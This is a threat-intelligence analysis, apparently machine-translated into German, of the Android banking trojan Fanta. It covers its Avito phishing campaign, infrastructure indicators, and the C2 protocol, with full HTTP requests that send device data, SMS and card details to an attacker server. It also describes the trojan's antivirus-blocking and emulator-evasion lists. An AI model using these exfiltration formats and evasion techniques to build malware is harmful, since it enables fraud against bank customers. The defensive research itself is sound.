Sobald Sie etwas auf Avito verkaufen möchten und eine detaillierte Beschreibung Ihres Produkts (z. B. ein RAM-Modul) erstellt haben, erhalten Sie folgende Meldung:
Wenn Sie den Link öffnen, sehen Sie eine ziemlich harmlose Seite, die Sie, einen glücklichen und erfolgreichen Verkäufer, über den Kauf informiert:
Nachdem Sie auf die Schaltfläche „Weiter“ geklickt haben, wird eine APK-Datei mit dem Symbol und dem vertrauenswürdigen Namen auf Ihr Android-Gerät heruntergeladen. Sie haben eine Anwendung installiert, die aus irgendeinem Grund AccessibilityService-Rechte angefordert hat. Dann wurden einige Fenster angezeigt und verschwanden schnell und ... Das war's.
Sie kommen herein, um Ihr Guthaben zu überprüfen, aber aus irgendeinem Grund werden Sie in Ihrem Bankantrag erneut nach Ihren Kartendaten gefragt. Nach der Eingabe der Daten passiert etwas Schreckliches: Aus irgendeinem Grund, der Ihnen noch nicht klar ist, verschwindet das Geld von Ihrem Konto. Sie versuchen, das Problem zu lösen, aber Ihr Telefon widersetzt sich: Es drückt die Tasten „Zurück“ und „Startseite“, schaltet sich nicht aus und ermöglicht keine Aktivierung von Schutzmitteln. Infolgedessen bleiben Sie ohne Geld, Ihre Waren wurden nicht gekauft, Sie sind verwirrt und fragen sich: Was ist passiert?
Die Antwort ist einfach: Sie sind ein Opfer des Android-Trojaners Fanta, der Flexnet-Familie. Wie ist das passiert? Wir werden es jetzt erklären.
Autoren:
Andrey Polovinkin , Junior-Spezialist für die Analyse bösartiger Codes,
Ivan Pisarev , Spezialist für die Analyse bösartiger Codes.
Einige Statistiken
Zum ersten Mal wurde die Flexnet Android Trojan-Familie bereits 2015 bekannt. Über einen ziemlich langen Zeitraum der Aktivität erweiterte sich die Familie auf mehrere Unterarten: Fanta, Limebot, Lipton usw. Der Trojaner und die damit verbundene Infrastruktur stehen nicht still: Es werden neue effektive Verteilungsschemata entwickelt - in unserem Fall hochwertige Phishing-Seiten, die sich an einen bestimmten Benutzer-Verkäufer richten, und die Entwickler des Trojaners folgen Modetrends beim Schreiben von Viren - und fügen neue Funktionen hinzu, die es ermöglichen, effektiver zu stehlen Geld von infizierten Geräten und Bypass-Schutzmechanismen.
Die in diesem Artikel beschriebene Kampagne richtet sich an Benutzer aus Russland, eine kleine Anzahl infizierter Geräte wurde in der Ukraine und noch weniger in Kasachstan und Weißrussland entdeckt.
Trotz der Tatsache, dass Flexnet seit mehr als 4 Jahren in der Arena der Android-Trojaner tätig ist und von vielen Forschern eingehend untersucht wurde, ist es immer noch in gutem Zustand. Ab Januar 2019 beträgt der potenzielle Schaden mehr als 35 Millionen Rubel - und dies gilt nur für Kampagnen in Russland. Im Jahr 2015 wurden verschiedene Versionen dieses Android-Trojaners in Untergrundforen verkauft, in denen auch der Quellcode des Trojaners mit einer detaillierten Beschreibung zu finden war. Und das bedeutet, dass die Schadensstatistik der Welt noch beeindruckender ist. Ein guter Indikator für einen so alten Mann, oder?
Vom Verkauf bis zum Betrug
Wie Sie dem Screenshot der Phishing-Seite für den Internetdienst zum Platzieren von Avito-Anzeigen entnehmen können, wurde diese für ein bestimmtes Opfer vorbereitet. Anscheinend verwenden die Angreifer einen der Avito-Parser und ziehen die Telefonnummer und den Namen des Verkäufers sowie eine Beschreibung des Produkts heraus. Nachdem die Seite erweitert und die APK-Datei vorbereitet wurde, wird dem Opfer eine SMS mit seinem Namen und einem Link zur Phishing-Seite gesendet, die eine Beschreibung des Produkts und den Betrag enthält, der aus dem „Verkauf“ des Produkts erhalten wurde. Durch Klicken auf die Schaltfläche erhält der Benutzer eine schädliche APK-Datei - Fanta.
Eine Untersuchung der Domäne shcet491 [.] Ru ergab, dass sie an die DNS-Server von Hostinger delegiert wurde:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Die Domänenzonendatei enthält Einträge, die auf die IP-Adressen 31.220.23 [.] 236, 31.220.23 [.] 243 und 31.220.23 [.] 235 verweisen. Der Domänenmaster-Ressourcendatensatz (A-Datensatz) verweist jedoch auf einen Server mit einer IP-Adresse von 178.132.1 [.] 240.
Die IP-Adresse 178.132.1 [.] 240 befindet sich in den Niederlanden und gehört zum WorldStream-
Hoster . Die IP-Adressen 31.220.23 [.] 235, 31.220.23 [.] 236 und 31.220.23 [.] 243 befinden sich im Vereinigten Königreich und gehören zum gemeinsam genutzten Hosting-Server HOSTINGER.
Openprov-ru wird als Registrar verwendet. Die folgenden Domänen wurden ebenfalls in die IP-Adresse 178.132.1 [.] 240 aufgelöst:
- sdelka-ru [.] ru
- tovar-av [.] ru
- av-tovar [.] ru
- ru-sdelka [.] ru
- shcet382 [.] ru
- sdelka221 [.] ru
- sdelka211 [.] ru
- vyplata437 [.] ru
- viplata291 [.] ru
- perevod273 [.] ru
- perevod901 [.] ru
Es ist zu beachten, dass fast alle Domains Links im folgenden Format hatten:
http: // (www.) {0,1} <% domain%> / [0-9] {7}Ein Link aus einer SMS-Nachricht fällt ebenfalls unter diese Vorlage. Historischen Daten zufolge wurde festgestellt, dass ein Link mehreren Links gemäß der obigen Vorlage entspricht, was auf die Verwendung einer Domain zur Verteilung des Trojaners an mehrere Opfer hinweist.
Lassen Sie uns etwas weiter gehen: Als Kontrollserver verwendet der über einen Link von SMS heruntergeladene Trojaner die Adresse
onuseseddohap [.] Club . Diese Domain wurde am 12.03.2019 registriert und ab dem 29.04.2019 interagierten APK-Anwendungen mit dieser Domain. Basierend auf den von VirusTotal empfangenen Daten interagierten insgesamt 109 Anwendungen mit diesem Server. Die Domain selbst wurde in die IP-Adresse
217.23.14 [.] 27 aufgelöst , die sich in den Niederlanden befindet und dem WorldStream-
Hoster gehört . Der
Namecheap wird als Registrar verwendet. Die Domains
Bad-Racoon [.] Club (ab dem 25.09.2018) und
Bad-Racoon [.] Live (ab dem 25.10.2018) wurden ebenfalls in diese IP-Adresse aufgelöst. Mehr als 80 APK-Dateien interagierten mit der
Club- Domain von
bad-racoon [.] , Mehr als 100 interagierten mit der
Live- Domain von
bad-racoon [.] .
Im Allgemeinen ist der Angriffsfortschritt wie folgt:
Was hat Fanta unter der Haube?
Wie viele andere Android-Trojaner kann Fanta SMS-Nachrichten lesen und senden, USSD-Anfragen stellen und über Anwendungen (einschließlich Bankanwendungen) eigene Fenster anzeigen. Das Arsenal an Funktionen dieser Familie wurde jedoch erreicht: Fanta begann, den
AccessibilityService für verschiedene Zwecke zu nutzen: Lesen des Inhalts von Benachrichtigungen aus anderen Anwendungen, Verhindern des Erkennens und Stoppen der Ausführung des Trojaners auf einem infizierten Gerät usw. Fanta funktioniert auf allen Android-Versionen, die nicht jünger als 4.4 sind. In diesem Artikel werden wir uns das folgende Fanta-Beispiel genauer ansehen:
- MD5 : 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1 : ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256 : df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Sofort nach dem Start
Unmittelbar nach dem Start versteckt der Trojaner sein Symbol. Der Anwendungsvorgang ist nur möglich, wenn der Name des infizierten Geräts nicht in der Liste enthalten ist:
- android_x86
- Virtualbox
- Nexus 5X (Groppe)
- Nexus 5 (Rasiermesser)
Diese Prüfung wird im Hauptdienst des Trojaners -
MainService durchgeführt . Beim ersten Start werden die Konfigurationsparameter der Anwendung mit Standardwerten (das Speicherformat der Konfigurationsdaten und deren Wert werden später erläutert) sowie der Registrierung eines neuen infizierten Geräts auf dem Verwaltungsserver initialisiert. Eine HTTP-POST-Anforderung wird mit dem Nachrichtentyp
register_bot und Informationen zum infizierten Gerät (Android-Version, IMEI, Telefonnummer, Betreibername und Ländercode, in dem der Betreiber registriert ist) an den Server gesendet. Die Adresse des Servers lautet
hXXp: // onuseseddohap [.] Club / controller.php . Als Antwort sendet der Server eine Nachricht mit den Feldern
bot_id ,
bot_pwd ,
server. Die Anwendung speichert diese Werte als Parameter des CnC-Servers. Der
Serverparameter ist optional, wenn das Feld nicht empfangen wurde: Fanta verwendet die Registrierungsadresse -
hXXp: // onuseseddohap [.] Club / controller.php . Die Funktion zum Ändern der CnC-Adresse kann verwendet werden, um zwei Probleme zu lösen: die Last gleichmäßig auf mehrere Server zu verteilen (bei einer großen Anzahl infizierter Geräte kann die Last auf einem nicht optimierten Webserver hoch sein) und bei Ausfall eines der CnC-Server einen alternativen Server zu verwenden .
Wenn beim Senden der Anforderung ein Fehler aufgetreten ist, wiederholt der Trojaner den Registrierungsvorgang nach 20 Sekunden.
Nach erfolgreicher Registrierung des Geräts zeigt Fanta dem Benutzer die folgende Meldung an:
Wichtiger Hinweis: Ein Dienst namens
Systemsicherheit ist der Name des Trojaner-Dienstes. Nach dem Klicken auf die Schaltfläche
OK wird ein Fenster mit den Eingabehilfeneinstellungen des infizierten Geräts geöffnet, in dem der Benutzer Eingabehilfen für den schädlichen Dienst ausstellen muss:
Sobald der Benutzer den
AccessibilityService aktiviert, erhält Fanta Zugriff auf den Inhalt der Anwendungsfenster und die darin ausgeführten Aktionen:
Unmittelbar nach Erhalt der Eingabehilfenrechte fordert der Trojaner Administratorrechte und das Recht zum Lesen von Benachrichtigungen an:
Mit dem AccessibilityService simuliert die Anwendung Tastenanschläge und gibt sich damit alle erforderlichen Rechte.
Fanta erstellt mehrere Datenbankinstanzen (die später beschrieben werden), die zum Speichern der Konfigurationsdaten sowie der während des Vorgangs gesammelten Informationen über das infizierte Gerät erforderlich sind. Um die gesammelten Informationen zu senden, erstellt der Trojaner eine sich wiederholende Aufgabe, mit der Felder aus der Datenbank entladen und ein Befehl vom Steuerungsserver empfangen werden soll. Das Intervall für den Zugriff auf CnC wird abhängig von der Android-Version festgelegt: Im Fall von 5.1 beträgt das Intervall 10 Sekunden, ansonsten 60 Sekunden.
Um einen Befehl zu erhalten,
sendet Fanta eine
GetTask- Anforderung an den Verwaltungsserver. Als Antwort kann CnC einen der folgenden Befehle senden:
Fanta sammelt auch Benachrichtigungen von 70 Bankanwendungen, Schnellzahlungssystemen und E-Wallets und speichert diese in einer Datenbank.
Speicher für Konfigurationseinstellungen
Zum Speichern von Konfigurationsparametern verwendet Fanta den Standardansatz für die Android-Plattform -
Voreinstellungsdateien . Die Einstellungen werden in einer Datei namens
Einstellungen gespeichert. Die Beschreibung der gespeicherten Parameter finden Sie in der folgenden Tabelle.
Fanta verwendet auch die
smsManager- Datei:
Datenbankinteraktion
Der Trojaner verwendet bei seiner Arbeit zwei Datenbanken. In einer Datenbank mit dem Namen
a werden verschiedene vom Telefon gesammelte Informationen gespeichert. Die zweite Datenbank heißt
fantasa.db und wird zum Speichern der Einstellungen verwendet, die für die Erstellung von Phishing-Fenstern zum Sammeln von Informationen über Bankkarten verantwortlich sind.
Der Trojaner verwendet eine Datenbank, um die gesammelten Informationen zu speichern und seine Aktionen zu protokollieren. Die Daten werden in der
Protokolltabelle gespeichert. Verwenden Sie zum Erstellen einer Tabelle die folgende SQL-Abfrage:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
Die Datenbank enthält folgende Informationen:
1. Melden Sie sich beim Einschalten eines infizierten Geräts mit der Meldung
Telefon an!2. Benachrichtigungen von Anwendungen. Die Nachricht wird gemäß der folgenden Vorlage gebildet:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Bankkartendaten aus den Trojaner-Phishing-Formularen.
Der Parameter
VIEW_NAME kann einer der folgenden sein:
- AliExpress
- Avito
- Google Play
- Verschiedenes <% App Name%>
Die Nachricht wird im folgenden Format protokolliert:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) :<%CARD_NUMBER%>; :<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Eingehende / ausgehende SMS-Nachrichten im Format:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] : /) <%Mobile number%>:<%SMS-text%>
5. Informationen zu dem Paket, mit dem das Dialogfeld erstellt wird, im folgenden Format:
(<%Package name%>)<%Package information%>
Beispielprotokolltabelle:
Eines der Merkmale von Fanta ist das Sammeln von Bankkarteninformationen. Die Datenerfassung erfolgt aufgrund der Erstellung von Phishing-Fenstern beim Öffnen von Bankanwendungen. Der Trojaner erstellt nur einmal ein Phishing-Fenster. Informationen, dass das Fenster dem Benutzer angezeigt wurde, werden in der
Einstellungstabelle in der Datenbank
fifa.db gespeichert. Die folgende SQL-Abfrage wird zum Erstellen der Datenbank verwendet:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
Alle Felder der
Einstellungstabelle werden standardmäßig mit 1 initialisiert (Phishing-Fenster erstellen). Nachdem der Benutzer seine Daten eingegeben hat, wird der Wert auf 0 gesetzt. Beispielfelder der
Einstellungstabelle :
- can_login - Das Feld ist dafür verantwortlich, das Formular beim Öffnen einer Bankanwendung anzuzeigen
- first_bank - wird nicht verwendet
- can_avito - Das Feld ist dafür verantwortlich, das Formular beim Öffnen der Avito-Anwendung anzuzeigen
- can_ali - Das Feld ist dafür verantwortlich, das Formular beim Öffnen der Aliexpress-Anwendung anzuzeigen
- can_another - Das Feld ist dafür verantwortlich, das Formular anzuzeigen, wenn eine Anwendung aus der Liste geöffnet wird : Yula, Pandao, Drome Auto, Wallet. Rabatt- und Bonuskarten, Aviasales, Buchung, Trivago
- can_card - Das Feld ist für die Anzeige des Formulars beim Öffnen von Google Play verantwortlich
Management Server-Interaktion
Die Netzwerkkommunikation mit dem Verwaltungsserver erfolgt über HTTP. Fanta verwendet die beliebte Retrofit-Bibliothek, um mit dem Netzwerk zu arbeiten. Anfragen werden an
hXXp gesendet
: // onuseseddohap [.] Club / controller.php . Die Serveradresse kann während der Registrierung auf dem Server geändert werden. Ein Cookie kann vom Server kommen. Fanta führt die folgenden Serveranforderungen aus:
- Der Bot wird beim ersten Start einmal auf dem Management Server registriert. Die folgenden Daten zum infizierten Gerät werden an den Server gesendet:
· Cookies - Vom Server empfangene Cookies (der Standardwert ist eine leere Zeichenfolge)
· Mode - String-Konstante register_bot
Präfix - Ganzzahlkonstante 2
· Version_sdk - wird nach folgendem Muster generiert: <% Build.MODEL%> / <% Build.VERSION.RELEASE%> (Avit)
Imei - IMEI des infizierten Geräts
· Ländercode des Landes, in dem der Betreiber registriert ist, im ISO-Format
· Nummer - Telefonnummer
· Operator - Operatorname
Ein Beispiel für eine an den Server gesendete Anfrage:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
Als Antwort auf die Anforderung sollte der Server ein JSON-Objekt zurückgeben, das die folgenden Parameter enthält:
· Bot_id - Kennung des infizierten Geräts. Wenn bot_id 0 ist, führt Fanta die Anforderung erneut aus.
· Bot_pwd - Passwort für den Server.
· Server - Die Adresse des Verwaltungsservers. Optionaler Parameter. Wenn der Parameter nicht angegeben wird, wird die in der Anwendung gespeicherte Adresse verwendet.
Beispiel für ein JSON-Objekt:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Anforderung, einen Befehl vom Server zu erhalten. Die folgenden Daten werden an den Server gesendet:
· Cookies - Vom Server empfangene Cookies
· Bid - ID des infizierten Geräts, das beim Senden der register_bot- Anforderung empfangen wurde
· Pwd - Passwort für den Server
· Divice_admin - Das Feld bestimmt, ob Administratorrechte erhalten wurden. Wenn Administratorrechte erhalten wurden, ist das Feld 1 , andernfalls 0
· Barrierefreiheit - Der Status des Barrierefreiheitsdienstes. Wenn der Dienst gestartet wurde, ist der Wert 1 , andernfalls 0
· SMSManager - Zeigt an, ob der Trojaner als Standardanwendung für den Empfang von SMS aktiviert ist
· Bildschirm - Zeigt den Status des Bildschirms an. Es wird auf 1 gesetzt, wenn der Bildschirm eingeschaltet ist, andernfalls auf 0 ;
Ein Beispiel für eine an den Server gesendete Anfrage:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
Abhängig vom Befehl kann der Server ein JSON-Objekt mit unterschiedlichen Parametern zurückgeben:
· Befehl SMS-Nachricht senden : Die Parameter enthalten die Telefonnummer, den Text der SMS-Nachricht und die Kennung der zu sendenden Nachricht. Die Kennung wird verwendet, wenn eine Nachricht mit dem Typ setSmsStatus an den Server gesendet wird .
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
· Telefonieren oder USSD-Befehl : Die Telefonnummer oder der Befehl befindet sich im Antworttext.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
· Befehl Ändern Sie den Intervallparameter .
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
· Befehl Intercept-Parameter ändern .
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
· Der Feldbefehl SmsManager ändern .
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
· Befehl Sammeln Sie SMS-Nachrichten von einem infizierten Gerät .
{ "response": [ { "mode": 9 } ], "status":"ok" }
· Setzen Sie das Telefon auf die Werkseinstellungen zurück :
{ "response": [ { "mode": 11 } ], "status":"ok" }
· Befehl ChangeDialog-Parameter ändern .
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Senden einer Nachricht vom Typ setSmsStatus . Diese Anfrage wird nach dem Befehl SMS senden ausgeführt . Die Anfrage lautet wie folgt:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>
- Senden von Datenbankinhalten. Für eine Anfrage wird eine Leitung übertragen. Die folgenden Daten werden an den Server gesendet:
· Cookies - Vom Server empfangene Cookies
· Mode - String-Konstante setSaveInboxSms
· Bid - ID des infizierten Geräts, das beim Senden der register_bot- Anforderung empfangen wurde
· Text - Text im aktuellen Datenbankeintrag (Feld d aus der Protokolltabelle in Datenbank a )
· Nummer - Name des aktuellen Datenbankdatensatzes (Feld p aus den Tabellenprotokollen in Datenbank a )
Sms_mode - ganzzahliger Wert (Feld m aus Tabellenprotokollen in Datenbank a )
Die Anfrage lautet wie folgt:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
Nach erfolgreichem Senden an den Server wird die Zeile aus der Tabelle gelöscht. Ein Beispiel für das vom Server zurückgegebene JSON-Objekt:
{ "response":[], "status":"ok" }
Interaktion mit AccessibilityService
AccessibilityService wurde implementiert, um die Verwendung von Android-Geräten durch Menschen mit Behinderungen zu erleichtern. In den meisten Fällen ist eine physische Interaktion erforderlich, um mit der Anwendung zu interagieren. Mit AccessibilityService können Sie sie programmgesteuert erstellen. Fanta verwendet den Dienst, um gefälschte Fenster in Bankanwendungen zu erstellen und das Öffnen von Systemeinstellungen und einigen Anwendungen zu verhindern.
Mithilfe der Funktionalität des AccessibilityService überwacht der Trojaner Änderungen an den Elementen auf dem Bildschirm eines infizierten Geräts. Wie bereits beschrieben, gibt es in den Fanta-Einstellungen einen Parameter, der für die Protokollierung von Vorgängen mit Dialogfeldern verantwortlich ist -
readDialog . Wenn dieser Parameter festgelegt ist, werden Informationen zum Namen und zur Beschreibung des Pakets, das das Ereignis ausgelöst hat, zur Datenbank hinzugefügt. Der Trojaner führt die folgenden Aktionen aus, wenn Ereignisse ausgelöst werden:
- Simuliert Tastenanschläge zurück und nach Hause bei:
· Wenn der Benutzer sein Gerät neu starten möchte
· Wenn der Benutzer die Anwendung „Avito“ entfernen oder die Zugriffsrechte ändern möchte
· Wenn auf der Seite die Anwendung „Avito“ erwähnt wird
· Wenn Sie die Anwendung "Google Play Protection" öffnen
· Beim Öffnen von Seiten mit AccessibilityService-Einstellungen
· Wenn das Dialogfeld "Systemsicherheit" angezeigt wird
· Beim Öffnen der Seite mit den Einstellungen "Über andere App zeichnen"
· Wenn Sie die Seite "Anwendungen", "Wiederherstellen und Zurücksetzen", "Daten zurücksetzen", "Einstellungen zurücksetzen", "Entwicklerfenster", "Spezial" öffnen. Chancen “,„ Zugänglichkeit “,„ Sonderrechte “
· Wenn das Ereignis von bestimmten Anwendungen generiert wurde.
Anwendungsliste- android
- Meister lite
- Master reinigen
- Clean Master für x86-CPU
- Meizu Applicatiom Permission Management
- MIUI-Sicherheit
- Clean Master - Antivirus- und Bereinigungscache und Junk
- Kindersicherung und GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Avast Antivirus & kostenloser Schutz 2019
- Mobile Sicherheit MegaFon
- AVG-Schutz für Xperia
- Mobile Sicherheit
- Malwarebytes Antivirus & Schutz
- Antivirus auf Android 2019
- Sicherheitsmaster - Antivirus, VPN, AppLock, Booster
- AVG Antivirus für Huawei System Manager Tablet
- Samsung Zugänglichkeit
- Samsung Smart Manager
- Sicherheitsmaster
- Geschwindigkeitsverstärker
- Dr.Web
- Dr.Web Sicherheitsraum
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus- und mobile Sicherheit
- Kaspersky Internet Security: Virenschutz und Schutz
- Kaspersky Batterielebensdauer: Saver & Booster
- Kaspersky Endpoint Security - Schutz und Verwaltung
- AVG Antivirus kostenlos 2019 - Schutz für Android
- Antivirus Android
- Norton Mobile Security und Antivirus
- Antivirus, Firewall, VPN, mobile Sicherheit
- Mobile Sicherheit: Antivirus, VPN, Diebstahlschutz
- Antivirus für Android
- Wenn beim Senden einer SMS-Nachricht an eine kurze Nummer eine Erlaubnis angefordert wird, ahmt Fanta das Klicken auf das Kontrollkästchen Auswahl speichern und Schaltfläche senden nach .
- Wenn Sie versuchen, dem Trojaner die Administratorrechte zu entziehen, wird der Telefonbildschirm gesperrt.
- Verhindert das Hinzufügen neuer Administratoren.
- Wenn die Antiviren-Anwendung dr.web eine Bedrohung erkennt, ahmt Fanta einen Klick auf die Schaltfläche Ignorieren nach .
- Ein Trojaner ahmt das Klicken auf eine Schaltfläche zurück und nach Hause nach, wenn ein Ereignis von der Samsung Device Care- Anwendung generiert wurde.
- Fanta erstellt Phishing-Fenster mit Formularen zur Eingabe von Informationen über Bankkarten, wenn eine Anwendung aus einer Liste gestartet wurde, die etwa 30 verschiedene Internetdienste enthält. Darunter: AliExpress, Booking, Avito, Google Play Market-Komponente, Pandao, Drome Auto usw.
Phishing-Formen
Fanta analysiert, welche Anwendungen auf dem infizierten Gerät ausgeführt werden. Wenn eine interessierende Anwendung geöffnet wurde, zeigt der Trojaner über allen anderen ein Phishing-Fenster an, in dem Informationen zu einer Bankkarte eingegeben werden. Der Benutzer muss folgende Daten eingeben:
- Kartennummer
- Ablaufdatum der Karte
- CVV
- Name des Karteninhabers (nicht für alle Banken)
Abhängig von der laufenden Anwendung werden unterschiedliche Phishing-Fenster angezeigt. Im Folgenden finden Sie Beispiele für einige davon:
Aliexpress:
Avito:
Für einige andere Anwendungen, z. B. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Wie es wirklich war
Glücklicherweise erwies sich die Person, die die am Anfang des Artikels beschriebene SMS-Nachricht erhalten hatte, als Spezialist auf dem Gebiet der Cybersicherheit. Daher unterscheidet sich die reale, nicht direktionale Version von der zuvor genannten: Die Person erhielt eine interessante SMS, die sie anschließend an das Group-IB Threat Hunting Intelligence-Team weitergab. Das Ergebnis des Angriffs ist dieser Artikel. Happy End, richtig? Allerdings enden nicht alle Geschichten so gut, und damit Ihre nicht wie die Regieversion mit Geldverlust aussieht, reicht es in den meisten Fällen aus, die folgenden, lange beschriebenen Regeln einzuhalten:
- Installieren Sie keine Anwendungen für ein mobiles Gerät mit Android-Betriebssystem aus anderen Quellen als Google Play
- Achten Sie bei der Installation der Anwendung besonders auf die von der Anwendung angeforderten Rechte
- Achten Sie auf die Dateierweiterung
- Installieren Sie regelmäßig Android OS-Updates
- Besuchen Sie keine verdächtigen Ressourcen und laden Sie keine Dateien von dort herunter
- Folgen Sie nicht den in SMS-Nachrichten empfangenen Links.
Group-IB weiß alles über Cyberkriminalität, erzählt aber die interessantesten Dinge.
Der actionreiche Telegrammkanal (https://t.me/Group_IB) über Informationssicherheit, Hacker und Cyberangriffe, Hacktivisten und Internetpiraten. Schrittweise Untersuchung sensationeller Cyberkriminalität, praktische Fälle mit Group-IB-Technologien und natürlich Empfehlungen, wie man vermeiden kann, im Internet Opfer zu werden.
YouTube-Kanal hier
Group-IB Photowire auf Instagram www.instagram.com/group_ib
Twitter Kurznachrichten twitter.com/GroupIB
Group-IB ist einer der führenden Entwickler von Lösungen zur Erkennung und Verhinderung von Cyberangriffen, zur Aufdeckung von Betrug und zum Schutz des geistigen Eigentums in einem Netzwerk mit Hauptsitz in Singapur.